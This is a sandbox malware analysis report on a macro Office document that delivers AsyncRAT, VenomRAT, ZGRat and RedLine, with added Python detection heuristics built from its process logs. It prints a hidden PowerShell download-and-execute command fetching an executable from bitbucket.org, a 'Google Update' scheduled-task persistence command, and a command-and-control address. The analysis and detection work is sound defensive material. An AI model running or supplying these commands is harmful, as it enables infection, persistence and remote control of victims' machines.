Malware Analysis Report

2024-11-15 08:41

Sample ID 241111-c3wp4atqcj
Target 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce
SHA256 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce
Tags
discovery execution macro asyncrat venomrat zgrat default rat redline @forxids infostealer doc @hukioside venom clients
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral21, behavioral30, behavioral1, behavioral12, behavioral29, behavioral31, behavioral9, behavioral16, behavioral18, behavioral17, behavioral19, behavioral22, behavioral23, behavioral27, behavioral2, behavioral6, behavioral14, behavioral28, behavioral4, behavioral5, behavioral7, behavioral13, behavioral26, behavioral32, behavioral15, behavioral20, behavioral24, behavioral8, behavioral10, behavioral25, behavioral3, behavioral11 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce

Threat Level: Known bad

The file 7a3b1e9c8df660dc1c1cf9b17411c1d6a4ffca364712c5de8ac46b1199ece1ce was found to be: Known bad.

Malicious Activity Summary

discovery execution macro asyncrat venomrat zgrat default rat redline @forxids infostealer doc @hukioside venom clients

AsyncRat

Process spawned unexpected child process

RedLine payload

Asyncrat family

Venomrat family

ZGRat

Redline family

RedLine

Detect ZGRat V2

VenomRAT

Zgrat family

Async RAT payload

Command and Scripting Interpreter: PowerShell

Suspicious Office macro

Blocklisted process makes network request

Loads dropped DLL

Uses the VBS compiler for execution

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 02:38

Signatures

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

68s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\errr.dotm"

Network

N/A

Files

memory/2648-0-0x000000002F9A1000-0x000000002F9A2000-memory.dmp

memory/2648-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2648-2-0x00000000715BD000-0x00000000715C8000-memory.dmp

memory/2648-8-0x0000000006770000-0x0000000006870000-memory.dmp

memory/2648-9-0x00000000715BD000-0x00000000715C8000-memory.dmp

memory/2648-10-0x0000000006770000-0x0000000006870000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

150s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm" /o ""

C:\Users\Admin\AppData\Local\Temp\powershell.exe

C:\Users\Admin\AppData\Local\Temp\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'
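
The launch chain in this run (WINWORD.EXE starting a copy of powershell.exe that lives in %TEMP%, which fetches a second stage from bitbucket.org and starts it) is the event a detection rule should key on, and the relocated interpreter is the detail that defeats rules matching only on the usual PowerShell path. The script below is an added example, not part of the sandbox report or of the sample: it takes the process record above, transcribed by hand into a constructed dictionary whose field names are this example's own, and returns which heuristics fire together with the URL and dropped-file indicators pulled from the command line. The Office and interpreter name sets and the list of directories where a genuine PowerShell binary is expected are assumptions of the example.

```python
import ntpath
import re

# Constructed process record, transcribed from the behavioral30 process list in
# this report. The field names are this example's own; a sandbox or EDR export
# would need mapping onto them.
SAMPLE_EVENT = {
    "parent_image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
    "image": r"C:\Users\Admin\AppData\Local\Temp\powershell.exe",
    "command_line": (
        r"C:\Users\Admin\AppData\Local\Temp\powershell.exe -ExecutionPolicy bypass "
        r"-noprofile -windowstyle hidden -command (New-Object System.Net.WebClient)"
        r".DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe',"
        r"'2d21412.exe');Start-Process '2d21412.exe'"
    ),
}

# Assumed name sets: Office hosts that should never spawn a script interpreter.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed locations of a genuine PowerShell binary on a stock Windows install;
# a powershell.exe anywhere else (here %TEMP%) is a relocated copy.
TRUSTED_PS_DIRS = (
    "c:\\windows\\system32\\windowspowershell\\",
    "c:\\windows\\syswow64\\windowspowershell\\",
    "c:\\program files\\powershell\\",
)

URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.IGNORECASE)
# Second quoted argument of WebClient.DownloadFile(url, localpath).
DOWNLOADFILE_RE = re.compile(r"""DownloadFile\(\s*'[^']+'\s*,\s*'([^']+)'""", re.IGNORECASE)


def analyze(event: dict) -> dict:
    """Return the heuristic hits and extracted indicators for one process-creation event."""
    parent = ntpath.basename(event["parent_image"]).lower()
    image = ntpath.basename(event["image"]).lower()
    image_path = event["image"].lower()
    cmd = " ".join(event["command_line"].split())   # collapse whitespace, keep case for URLs
    cmd_l = cmd.lower()
    findings = []

    if parent in OFFICE_APPS and image in INTERPRETERS:
        findings.append("office_spawns_interpreter")
    if image in {"powershell.exe", "pwsh.exe"} and not image_path.startswith(TRUSTED_PS_DIRS):
        findings.append("interpreter_outside_trusted_dir")
    if re.search(r"-e[a-z]*\s+bypass", cmd_l):      # -ExecutionPolicy / -ep / -ex bypass
        findings.append("execution_policy_bypass")
    if re.search(r"-w[a-z]*\s+hidden", cmd_l):      # -WindowStyle / -w hidden
        findings.append("hidden_window")
    if "downloadfile" in cmd_l and (
        "start-process" in cmd_l or "invoke-expression" in cmd_l or re.search(r"\biex\b", cmd_l)
    ):
        findings.append("download_and_execute")

    return {
        "findings": findings,
        "urls": URL_RE.findall(cmd),
        "dropped_files": DOWNLOADFILE_RE.findall(cmd),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENT)
    for hit in result["findings"]:
        print("HIT", hit)
    print("URLs:", result["urls"])
    print("Dropped:", result["dropped_files"])
```

Each heuristic stands on its own, so the Office-to-interpreter relation and the command-line content still fire if an attacker renames the copied binary; the path check is there to catch the relocation itself, which is worth its own alert because it only happens when someone is deliberately dodging a path-based rule.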

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp (30 connections)
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/3900-0-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-1-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

memory/3900-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-6-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-5-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-11-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

memory/3900-7-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

memory/3900-12-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-13-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-15-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-16-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

memory/3900-14-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-18-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-20-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-19-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-17-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-45-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3900-52-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-53-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

memory/3900-54-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-55-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-61-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

memory/3900-62-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCD498.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240729-en

Max time kernel

131s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect ZGRat V2

Description Indicator Process Target
N/A N/A N/A N/A

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Venomrat family

venomrat

ZGRat

rat zgrat

Zgrat family

zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2720 set thread context of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Google Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 2708 (4 events) N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe
PID 2720 wrote to memory of 2844 (12 events) N/A C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2844 wrote to memory of 3052 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 (4 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2952 (4 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1496 wrote to memory of 1904 (4 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2708 wrote to memory of 2272 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 2272 wrote to memory of 2368 (3 events) N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2708 wrote to memory of 640 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 640 wrote to memory of 2480 (3 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1496 wrote to memory of 284 (4 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 640 wrote to memory of 2644 (3 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B57.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp819E.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"
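
Three behaviours in this process list are worth turning into host-side detections: the loader in %TEMP% setting the thread context of an argument-less InstallUtil.exe (the process-hollowing shape behind the "Suspicious use of SetThreadContext" row), the schtasks /create that registers "Google Update" at logon with /rl highest pointing at a binary under %APPDATA%, and the batch file that sleeps with timeout 3 before starting that persisted copy. The script below is an added example, not part of the report or of the sample. It works on a constructed process table transcribed from one of the two identical persistence branches above (the InstallUtil.exe side); the parent/child links are inferred from the "PID X wrote to memory of Y" rows, which is an assumption, since the sandbox does not print parent PIDs, and the user-writable path prefixes and vendor-name list are assumptions of the example.

```python
import ntpath
import re
from collections import defaultdict

# Constructed process table: (pid, parent pid, image, command line), transcribed from
# the behavioral1 run. Parent pids are inferred from the WriteProcessMemory rows
# (an assumption of this example); pid 0 marks the root.
PROCESSES = [
    (2720, 0,    r"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"'),
    (2708, 2720, r"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe"'),
    (2844, 2720, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"),
    (3052, 2844, r"C:\Windows\SysWOW64\cmd.exe",
     r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit'''),
    (2952, 3052, r"C:\Windows\SysWOW64\schtasks.exe",
     r"""schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'"""),
    (1496, 2844, r"C:\Windows\SysWOW64\cmd.exe",
     r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B57.tmp.bat""'),
    (1904, 1496, r"C:\Windows\SysWOW64\timeout.exe", "timeout 3"),
    (284,  1496, r"C:\Users\Admin\AppData\Roaming\Google Update.exe",
     r'"C:\Users\Admin\AppData\Roaming\Google Update.exe"'),
]
# "Suspicious use of SetThreadContext" row, as (source pid, target pid).
SET_THREAD_CONTEXT = [(2720, 2844)]

# Assumed: path fragments that any user can write to, and vendor names that
# malware borrows for task names.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
VENDOR_NAMES = {"google", "microsoft", "adobe", "windows"}


def _arg(cmd, switch):
    """Value of an schtasks switch such as /sc or /tr, with surrounding quotes of either kind dropped."""
    m = re.search(r"/%s\s+['\"]*([^'\"/]+)" % switch, cmd, re.IGNORECASE)
    return m.group(1).strip() if m else None


def schtasks_persistence(cmd):
    """Flag schtasks /create when it persists a user-writable binary at logon/boot with an
    elevated run level, or hides behind a vendor-sounding name outside Program Files."""
    if not re.search(r"\bschtasks\b.*\s/create\b", cmd, re.IGNORECASE):
        return None
    sc, rl, tn, tr = (_arg(cmd, s) for s in ("sc", "rl", "tn", "tr"))
    reasons = []
    if sc and sc.lower() in {"onlogon", "onstart"}:
        reasons.append("trigger_" + sc.lower())
    if rl and rl.lower() == "highest":
        reasons.append("run_level_highest")
    if tr and any(d in tr.lower() for d in USER_WRITABLE):
        reasons.append("task_binary_in_user_writable_path")
    if tn and tr and any(v in tn.lower() for v in VENDOR_NAMES) and "\\program files" not in tr.lower():
        reasons.append("vendor_name_outside_program_files")
    return {"task_name": tn, "task_run": tr, "reasons": reasons} if reasons else None


def hollowing_candidates(processes, set_thread_context):
    """SetThreadContext from a binary in a user-writable path into a Windows-signed process
    that was started without arguments is the classic hollowing / RunPE shape."""
    by_pid = {p[0]: p for p in processes}
    hits = []
    for src, dst in set_thread_context:
        s_img = by_pid[src][2]
        d_img, d_cmd = by_pid[dst][2], by_pid[dst][3]
        src_untrusted = any(d in s_img.lower() for d in USER_WRITABLE)
        dst_windows = d_img.lower().startswith("c:\\windows\\")
        no_args = d_cmd.strip().strip('"').lower() == d_img.lower()
        if src_untrusted and dst_windows and no_args:
            hits.append((ntpath.basename(s_img), ntpath.basename(d_img)))
    return hits


def delayed_relaunch(processes):
    """cmd.exe running a .tmp.bat whose children are timeout.exe plus a binary under
    AppData: the 'sleep, then start the persisted copy' batch seen in this run."""
    children = defaultdict(list)
    for pid, ppid, img, _ in processes:
        children[ppid].append(img)
    hits = []
    for pid, _, img, cmd in processes:
        if ntpath.basename(img).lower() == "cmd.exe" and ".tmp.bat" in cmd.lower():
            kids = children[pid]
            if any(ntpath.basename(k).lower() == "timeout.exe" for k in kids):
                hits.extend(k for k in kids if "\\appdata\\" in k.lower())
    return hits


def run(processes=PROCESSES, stc=SET_THREAD_CONTEXT):
    """Evaluate all three heuristics over a process table."""
    tasks = {pid: schtasks_persistence(cmd) for pid, _, _, cmd in processes}
    return {
        "scheduled_tasks": {pid: t for pid, t in tasks.items() if t},
        "hollowing": hollowing_candidates(processes, stc),
        "delayed_relaunch": delayed_relaunch(processes),
    }


if __name__ == "__main__":
    for key, value in run().items():
        print(key, value)
```

The schtasks parser reports both the cmd.exe wrapper and the schtasks.exe child, which is intentional: on a host where only one of the two command lines is logged (Sysmon Event ID 1 captures both, many EDRs only the leaf), the rule still fires. The hollowing check deliberately requires the target to have been started without arguments; InstallUtil.exe has no legitimate use without a path to install, so that single condition removes most benign noise.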

Network

Country Destination Domain Proto
NL 45.137.65.94:4449 tcp (6 connections)

Files

memory/2720-0-0x0000000073EDE000-0x0000000073EDF000-memory.dmp

memory/2720-1-0x0000000000A40000-0x0000000004EA4000-memory.dmp

memory/2720-2-0x0000000073ED0000-0x00000000745BE000-memory.dmp

memory/2720-3-0x0000000009680000-0x000000000978A000-memory.dmp

memory/2720-4-0x0000000000590000-0x00000000005B8000-memory.dmp

memory/2720-5-0x0000000008860000-0x00000000088F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

MD5 1f304261de14934db9384720c638744a
SHA1 b98f60e6feea77a31363d5a686e7be40f6cfc049
SHA256 ab23ec09d1ea7a359bd834f2fef7aa5272e8f643e9c27cb2bfe8869a6e447e87
SHA512 01f29cf8553d72070c56b953c23771fef9e4aba31b733b001f7b8a1e49e2cf02d120b21baf76ccfa9040548ed603c0308c95a4fedce7b4749fc01baf3c4fc826

memory/2708-12-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp

memory/2708-13-0x0000000000290000-0x00000000002A8000-memory.dmp

memory/2844-16-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-22-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2844-24-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-20-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-18-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-14-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-28-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2844-26-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/2720-31-0x0000000073ED0000-0x00000000745BE000-memory.dmp

memory/2708-32-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7B57.tmp.bat

MD5 10313b055491c488dced60caddafb571
SHA1 3fe476c1cdc9036bc99f35123badd79d6941ab45
SHA256 9b9e4730d0a8bba065f533a0ebd4d6d062fcbfc9690bb8901ec45bfc4c75c352
SHA512 00d6a7b1a7bce457354357662071d08e10afb56094a574ba65f62ca0a3acafe7c77b80c9a4720ab135d5245bcebdaaa217cb81418dd111a8a875c30f76c67f7b

C:\Users\Admin\AppData\Roaming\Google Update.exe

MD5 91c9ae9c9a17a9db5e08b120e668c74c
SHA1 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256 e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
